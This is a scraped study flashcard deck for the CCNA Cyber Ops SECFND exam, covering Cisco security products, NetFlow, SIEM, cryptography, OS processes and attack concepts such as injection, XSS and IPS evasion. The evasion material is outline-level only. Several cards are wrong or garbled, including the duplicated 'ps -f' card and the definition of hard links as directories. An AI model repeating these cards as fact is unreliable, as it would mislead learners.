*** Most important. Based on blueprint Flashcards Preview

CCNA Cyber Ops SECFND > *** Most important. Based on blueprint > Flashcards

Flashcards in *** Most important. Based on blueprint Deck (83)
Loading flashcards...
1
Q

CAPWAP

A

Encapsulates data between LWAP and WLC. Routable. Wireless IPS. Much more

2
Q

ARP

A

Operates between L2 and L3.

3
Q

ARP Ethertype

A

0x0806

4
Q

DNS Resolver

A

local client

5
Q

DNS Recursor

A

Internal DNS

6
Q

Bridges vs. Switches

A

Bridges use SW bridging logic. Switches use HW bridging logic.

7
Q

Cisco AMP

A

Advanced Malware Protection. Applies before, during, and after attack continuum. Examines SHA hash. Cloud tests files. Machine learning. Trajectory. Intel feeds.

8
Q

Cisco WSA

A

Web Security Appliance. URL Filtering. Websense type features.

9
Q

Cisco CWS

A

Cloud Web Security. Basically, Websense in the cloud. Request goes from ASA to CWS where decision is made.

10
Q

Cisco ESA

A

Email Security Appliance. Incoming reputation filter, outgoing DLP

11
Q

Cisco CES

A

ESA in the cloud

12
Q

Cisco Firepower

A

NGFW with VPN, IPS, AMP, DNS inspection, application visibility and control, reputation-based filtering, URL filtering, SSL decryption, and so on

13
Q

Netflow

A

Collects/monitors network traffic flow data.
Audit trail.
Unidirectional series of packets bet. source and destination.

14
Q

What does Netflow data contain?

A
Metadata
5 Tuple
Interfaces
Duration of comms
Transmission rate
Amount of data
15
Q

Netflow vs. IPS

A

Netflow looks at headers. IPS does deep packet analysis.

Netflow is information about comms. IPS can drop packets.

16
Q

Runbook automation

A

Automated reactions. Can minimize time bet. discovery and remediation.

17
Q

Runbook parts

A

Tools, Workflows, Processes

18
Q

Sliding Window

A

Relates to anomaly detection. Needs to be long enough to define normal traffic.

19
Q

Non-discretionary access control

A

Role Based AC. Job function related.

20
Q

Network vs. Host AV

A

Network AV takes action on files that are traversing the network.

Host AV is run by endpoints.

21
Q

Agent vs. Agentless

A

Netflow is agentless

22
Q

SIEM Capabilities

A
Monitoring
IR
Anomaly Detection
Real time rule based alerts
Correlation
Logging and reporting
Reports
23
Q

New Syslog name

A

rsyslog (old was syslogd)

24
Q

Syslog config file location

A

/etc/syslog.conf

25
Q

27002:2013

A

provides guidelines for organizational information, security standards, and information security management practices,

26
Q

Vulnerability management

A

identifying, classifying, remediating, and mitigating vulnerabilities in software, firmware, and hardware.

27
Q

Configuration management

A

process for establishing and maintaining consistency of a product’s performance, functional requirements, and design throughout the product’s life cycle.

28
Q

Digital signature creation

A

Hash the document
Encrypt the hash with private key of signer
Encrypted hash is appended to document

29
Q

Digital signature verification

A

Recipient check public key of the signer
Recipient decrypts the signature using he public key leaving the hash
Recipient rehashes the document. Hash match means it’s authentic.

30
Q

CSR contains

A

System name, organization, location, enrolling systems public key info.

31
Q

TACACS+ Hashing algorithm

A

MD5

32
Q

MD5 vs. SHA-1

A

128 bit vs. 160 bit digest.

NIST recommends avoiding both

33
Q

ECDHE_ECDSA

A

Authentication and Key Exchange

34
Q

DSA

A

Assymetric. Digital Signature Algorithm.

Creates digital sigs. (hashing)

35
Q

PRF

A

Pseudorandom Function

36
Q

Cipher Suite Contains…

A
Authentication
Key Exchange
Encryption Algorithm
MAC (SHA)
PRF
37
Q

TLS 1.2

A

Defines mandatory cipher suites (RSA, AES, SHA)

38
Q

TLS 1.2 Mandatory Cipher Squites

A

RSA, AES, SHA

39
Q

PKCS

A

Public Key Crypto Standard.. Numbered standards for RSA, DH, PKI Syntax and more

40
Q

Windows Process

A

Instance of an executing program

41
Q

Windows thread

A

Basic unit that OS allocates processing time to. Can execute any part of the process code.

42
Q

Windows object handle

A

Accesses resources (files, etc) on behalf of a process.

Processes can’t access resources directly. Must use handles.

43
Q

Windows Memory allocated to which modes

A

Kernel mode and User mode

44
Q

Transaction data

A

Log files for various services (HTTP, SMTP, Linux, etc.)

Includes client action and system own action).

45
Q

Session data

A

Metadata similar to NetFlow or phone bill. 5 tuple info, time stamps, etc.

Summary of comms bet. 2 parties.

46
Q

Extracted content

A

Mined from network traffic

47
Q

Facility

A

application or process that submits the log message.

48
Q

RFC 1918

A

Internal private addresses

49
Q

NSA Suite B

A
RFC 6739
Crypto algorithms devices must support to meet federal standards.
AES 128-256 (CTR-GCM)
ECDSA, ECDH
SHA256-384
50
Q

Linux PS command

A

Get information about processes

51
Q

ps -f

A

Full output

52
Q

ps -e

A

Everyone (all users)

53
Q

ps -f

A

Full output for everyone

54
Q

ps aux

A

ps -ef for BSD

55
Q

ps -fC sshd

A

-C used to filter by process

56
Q

Alert data

A

Generally produced by IPS/IDS

57
Q

packets, bytes, and bandwidth =

A

NetFlow

58
Q

Process# for forked process

A

0

59
Q

AV vs. Anti-Malware

A

AV: Signature/heuristics/behavior based. Low efficacy
AM: Anomaly, Big data, continuous analysis, advanced analytics

60
Q

App visibility and control

A

Differentiating between parts of services (Allow IM, but not file transfer. Allow Facebook, but not facebook games)

61
Q

NextGen FW Connection Event

A

Blocked connections based on rules.

Time, hosts, protocols, amount of data

62
Q

IPS/Intrusion Event

A

Based on IPS rule that triggers event.

Packet level info. 
Time
5 tuple
Country
Triggering rule
63
Q

NGFW Host event

A

Host profile
IOC’s
Category
Event type

64
Q

Network discovery events

A

Triggered by changes on the network

65
Q

Netflow event

A

Used to detect data loss using Cisco Stealthwatch.

Flows denied by access rule

66
Q

NTP attacks

A

Amplification. Falsify time advertisement to throw off logs.

Possible to auth time source (NTP Server)

67
Q

Web proxy log

A

Precise logging of browsing sessions and can help investigate web based attacks.

68
Q

Attack surface vs. Vulnerabilty

A

Surface is “total sum of all the vulnerabilities”

Vulnerability is a defect in SW or HW.

69
Q

Attack surfaces

A

Software, physical, network, human

70
Q

SQL Injection

A

Can read, modify data, execute admin ops, and sometimes issue OS commands.

Input validation.

71
Q

Command injection attacks (2)

A

SQL injection. XSS

Input validation and IPS

72
Q

XSS

A

Injection of malicious scripts that run on client.

Caused by weakness in client scripting languages

73
Q

XSS Countermeasures

A

Input validation, DNS block, web proxy, IPS, Education

74
Q

IPS Evasion methods

A

Traffic fragmentation
Traffic substitution/insertion (Unicode characters)
Encryption/Tunneling

75
Q

Traffic fragmentation

A

IP Fragmentation. Fragment all IP traffic if IPS doesn’t do fragment reassembly.

TCP fragmentation:

76
Q

TCP fragmentation

A

Fragment a TCP stream to overwrite/overlap previous TCP segment with new data. Hides attack

77
Q

Traffic substitution

A

Substitute payload with other data that has the same meaning.

Unicode, case sensitivity change, substitute spaces with tabs.

78
Q

Evasion: Tunneling

A

Hide traffic over permitted protocol like DNS, HTTP.

Or combine encryption & tunneling: HTTPS

79
Q

Protocol-level misinterpretation

A

Change aspects of packets to confuse IPS sensor.

TCP checksum
Big/Little Endian

80
Q

Hard links

A

Directories (not really links)

81
Q

Malware (3)

A

Virus, Work, Trojan)

82
Q

Remote vs. Local Exploit

A

Remote works over the network without prior access.

Local exploit requires prior access (an account on the system). Lead to privilege escalation. (DOES NOT require physical access). Social engineering

83
Q

AES CTR

A

Part of NSA Suite B, though GCM is more common

Both are counter mode